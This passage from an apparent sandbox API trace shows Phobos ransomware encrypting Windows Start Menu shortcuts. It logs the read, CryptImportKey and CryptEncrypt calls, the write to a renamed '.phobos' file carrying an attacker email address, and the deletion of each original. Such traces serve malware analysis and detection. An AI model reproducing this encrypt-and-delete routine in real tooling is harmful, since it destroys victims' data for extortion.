Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.390] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1230) returned 1 [0176.390] CloseHandle (hObject=0x194) returned 1 [0176.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk")) returned 0x20 [0176.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.390] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.391] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.391] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.391] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.392] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.392] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ce, lpOverlapped=0x0) returned 1 [0176.393] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0) returned 1 [0176.393] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4d0, lpOverlapped=0x0) returned 1 [0176.394] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.394] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.394] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.394] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.394] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.394] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.394] CloseHandle (hObject=0x194) returned 1 [0176.394] CloseHandle (hObject=0x158) returned 1 [0176.394] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Calculator.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\calculator.lnk")) returned 1 [0176.396] SetEvent (hEvent=0xe8) returned 1 [0176.396] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.396] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1266) returned 1 [0176.396] CloseHandle (hObject=0x158) returned 1 [0176.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk")) returned 0x20 [0176.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.397] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.397] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.403] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.403] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.403] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f2, lpOverlapped=0x0) returned 1 [0176.404] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0176.404] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0176.405] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.405] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.405] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.405] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.405] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.405] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.405] CloseHandle (hObject=0x158) returned 1 [0176.405] CloseHandle (hObject=0x194) returned 1 [0176.405] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\displayswitch.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\displayswitch.lnk")) returned 1 [0176.407] SetEvent (hEvent=0xe8) returned 1 [0176.407] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.407] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1364) returned 1 [0176.407] CloseHandle (hObject=0x194) returned 1 [0176.407] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk")) returned 0x20 [0176.407] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.408] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.408] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.412] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.412] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.412] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x554, lpOverlapped=0x0) returned 1 [0176.414] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x560, dwBufLen=0x560 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x560) returned 1 [0176.414] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x560, lpOverlapped=0x0) returned 1 [0176.415] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.415] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.415] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.415] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.415] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.415] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.415] CloseHandle (hObject=0x194) returned 1 [0176.415] CloseHandle (hObject=0x158) returned 1 [0176.415] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Math Input Panel.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\math input panel.lnk")) returned 1 [0176.417] SetEvent (hEvent=0xe8) returned 1 [0176.417] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.418] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1238) returned 1 [0176.418] CloseHandle (hObject=0x158) returned 1 [0176.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk")) returned 0x20 [0176.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.418] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.419] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.420] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.420] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.420] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4d6, lpOverlapped=0x0) returned 1 [0176.421] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.421] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.422] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.422] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.422] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.422] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.422] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.422] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.422] CloseHandle (hObject=0x158) returned 1 [0176.423] CloseHandle (hObject=0x194) returned 1 [0176.423] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Mobility Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\mobility center.lnk")) returned 1 [0176.424] SetEvent (hEvent=0xe8) returned 1 [0176.425] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.425] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.425] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1242) returned 1 [0176.425] CloseHandle (hObject=0x194) returned 1 [0176.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk")) returned 0x20 [0176.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.426] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.426] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.427] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.427] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.427] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4da, lpOverlapped=0x0) returned 1 [0176.429] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.429] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.430] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.430] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.430] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.430] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.430] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.430] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.430] CloseHandle (hObject=0x194) returned 1 [0176.430] CloseHandle (hObject=0x158) returned 1 [0176.431] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\NetworkProjection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\networkprojection.lnk")) returned 1 [0176.432] SetEvent (hEvent=0xe8) returned 1 [0176.433] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.433] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.433] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1242) returned 1 [0176.433] CloseHandle (hObject=0x158) returned 1 [0176.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk")) returned 0x20 [0176.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start 